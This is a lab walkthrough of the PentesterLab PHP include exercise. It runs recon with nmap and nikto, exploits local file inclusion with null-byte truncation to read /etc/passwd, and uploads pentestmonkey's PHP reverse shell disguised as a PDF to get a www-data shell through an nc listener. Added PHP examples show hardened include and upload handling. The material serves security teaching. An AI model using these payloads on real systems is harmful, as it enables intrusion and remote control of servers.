Cracking PHP Include And Post Exploitation lab
Before we move on to cracking a real web app, let's work through the PentesterLab "PHP Include And Post Exploitation" lab.
Download php_include_and_post_exploitation.iso from the link below and boot it as a live CD (here in VirtualBox, on a host-only network):
https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/
Recon
We use netdiscover for host discovery (it sends and listens for ARP traffic on the local segment) and nmap for port and service enumeration.
netdiscover
Currently scanning: 172.16.138.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor
192.168.56.100 08:00:27:75:46:19 1 60 PCS Systemtechnik GmbH
192.168.56.104 08:00:27:b0:86:4d 1 60 PCS Systemtechnik GmbH
192.168.56.104 is our target. (On a default VirtualBox host-only setup, 192.168.56.1 is the host's adapter and 192.168.56.100 is VirtualBox's DHCP server.)
nmap
root@kali:/etc/nginx# nmap -sSV --version-intensity 9 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 20:31 PST
Nmap scan report for 192.168.56.104
Host is up (0.00024s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:B0:86:4D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds
Only port 80 is open; everything else is filtered. The banner gives Apache 2.2.16 on Debian.
CVE & vulnerability scanning
nikto
root@kali:/etc/nginx# nikto -h 192.168.56.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.104
+ Target Hostname: 192.168.56.104
+ Target Port: 80
+ Start Time: 2019-11-05 21:11:19 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3513, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2019-11-05 21:11:32 (GMT-8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Let's try local file inclusion. Nikto flagged "/index.php: PHP include error", so the page parameter is the obvious place to start:
curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd
<div class="block" id="block-text">
<div class="secondary-navigation">
<div class="content">
Warning: include(../../../../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/index.php on line 28
Warning: include(): Failed opening '../../../../../../../../etc/passwd.php' for inclusion (include_path='.:') in /var/www/index.php on line 28
</div>
</div>
</div>
<div id="footer">
<div class="block">
<p>Copyright </p>
</div>
</div>
</div>
The warning tells us two things: the page parameter reaches include() unfiltered (the traversal itself was not blocked), and the application appends .php to it, so our path became /etc/passwd.php, which does not exist.
The x-powered-by header above says PHP/5.3.2. Before PHP 5.3.4, a path containing a null byte (%00) is handed to the C library as a NUL-terminated string, so everything after the %00, including the appended .php, is silently dropped:
https://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
Let's try again with %00 at the end of the path.
root@kali:/etc/nginx# curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd%00
<div class="block" id="block-text">
<div class="secondary-navigation">
<div class="content">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
</div>
</div>
</div>
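To make the root cause concrete, here is an added example (not the lab's source, which we have not read, and not the author's code) reconstructing the include pattern implied by the warnings above, next to two hardened forms. The page names, the pages/ directory and the function names are assumptions.

```php
<?php
// Added example: reconstructs the include pattern implied by the warnings
// ("include(../../etc/passwd.php)"), then shows how it should be written.
// Page names, the pages/ directory and all function names are hypothetical.

// Vulnerable: attacker-controlled input is concatenated into include().
// On PHP < 5.3.4 the path reaches the C runtime as a NUL-terminated string,
// so "../../etc/passwd\0" + ".php" stops at the NUL and the ".php" suffix is
// never seen. On 5.3.4+ a NUL in the path makes include() fail instead; that
// closes the %00 trick but not the traversal, which still reads any *.php.
function vulnerable_page_include(string $page): void
{
    include($page . '.php');
}

// Hardened: never build the path from user input. Map the parameter onto a
// fixed allowlist of page names and refuse everything else.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function safe_page_include(string $page): void
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        http_response_code(404);
        return;
    }
    include __DIR__ . '/pages/' . $page . '.php';
}

// Defence in depth when an allowlist is impractical: canonicalise the path and
// require that it resolves inside the pages directory. The NUL check is done
// explicitly because PHP versions differ in how realpath() reacts to embedded
// NULs (warning and false, or a ValueError on PHP 8).
function resolve_page_path(string $page): ?string
{
    if (strpos($page, "\0") !== false) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . '/' . $page . '.php');
    if ($candidate === false) {
        return null;
    }
    // Compare with the trailing separator so "pages_private/x.php" does not
    // pass as a prefix match of "pages".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Front-controller usage of the allowlist variant.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
safe_page_include($page);
```

With the allowlist in place, ?page=../../../../etc/passwd%00 simply gets a 404; there is no string left for the null byte to truncate. The realpath() variant is the fallback for applications that genuinely need dynamic file names, and even then it should be paired with open_basedir and a PHP version that rejects NULs in paths.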
Upload reverse shell & craft a PDF attack vector
That worked. Next, we craft a PHP reverse shell and try to upload it.
For this we use pentestmonkey's PHP reverse shell:
https://github.com/pentestmonkey/php-reverse-shell
curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.pdf
Edit it with your favourite text editor: prepend the PDF magic bytes %PDF-1.4 as the very first line so the file passes as a PDF, and change $ip and $port to your Kali listener. PHP simply echoes the %PDF-1.4 line as text and then executes everything inside the <?php tag, so the camouflage does not stop the payload.
%PDF-1.4
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
That is what the top of the file should look like.
Back on Kali, start a listener on port 4444:
root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Upload shell.pdf through the application's upload form, then pull it in through the same include, again with %00 to drop the appended .php:
http://192.168.56.104/index.php?page=uploads/shell.pdf%00
root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.104.
Ncat: Connection from 192.168.56.104:33439.
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
05:24:23 up 57 min, 6 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user tty2 04:27 56:59 0.00s 0.00s -bash
user tty3 04:27 56:59 0.00s 0.00s -bash
user tty4 04:27 56:59 0.00s 0.00s -bash
user tty5 04:27 56:59 0.00s 0.00s -bash
user tty6 04:27 56:59 0.00s 0.00s -bash
user tty1 04:27 56:59 0.00s 0.00s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
Got it. We have a shell as www-data on the target.
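Why did a file called shell.pdf run as PHP? Two weaknesses combined: the upload check (whatever it was in this lab, we only know that a %PDF-1.4 prefix satisfied it) looked at the content rather than controlling where and under what name the file was stored, and the include() above can reach the upload directory. As an added example, not the lab's code and not the author's, here is a magic-bytes-only check of the kind the prefix defeats, next to an upload handler that stores files outside the web root under a server-chosen name and serves them back as downloads. The directory, function names and the 32-hex naming scheme are assumptions; the hardened handler needs PHP 7+ for random_bytes().

```php
<?php
// Added example, not from the lab. Contrasts a content-only upload check with
// a handler that makes the stored file unreachable by include(). All names,
// the storage directory and the naming scheme are hypothetical.

// Weak: magic bytes only. shell.pdf starts with "%PDF-1.4", so this passes,
// and if the file keeps its original name under the web root, index.php's
// include() can later execute the PHP that follows the first line.
function weak_pdf_check(string $tmpPath): bool
{
    $head = file_get_contents($tmpPath, false, null, 0, 5);
    return $head === '%PDF-';
}

// Hardened handler for one entry of $_FILES.
function store_pdf_upload(array $file, string $storeDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Content check. libmagic also keys on "%PDF-" at offset 0, so a polyglot
    // like shell.pdf still passes here; this filters junk, it is not the
    // control that stops code execution. The controls below are.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'application/pdf') {
        return null;
    }
    // Never trust the client's filename: random name, fixed extension.
    $name = bin2hex(random_bytes(16)) . '.pdf';
    // $storeDir must lie outside the document root and outside anything the
    // application ever passes to include(); files are served via send_pdf().
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);
    return $name;
}

// Serve a stored file back by its server-assigned name only, as a download
// with a fixed Content-Type so the browser never sniffs the bytes.
function send_pdf(string $storeDir, string $name): void
{
    if (!preg_match('/\A[0-9a-f]{32}\.pdf\z/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($storeDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="document.pdf"');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

// Usage (hypothetical form field "document", storage under /srv/uploads):
if (isset($_FILES['document'])) {
    $stored = store_pdf_upload($_FILES['document'], '/srv/uploads');
    echo $stored === null ? 'rejected' : 'stored as ' . $stored;
}
```

The point is that the upload handler and the include are fixed independently: even if a polyglot slips past the content check, a random name under /srv/uploads is neither guessable nor inside any directory that index.php will ever include, so the reverse shell in shell.pdf is just bytes in a PDF that nothing executes.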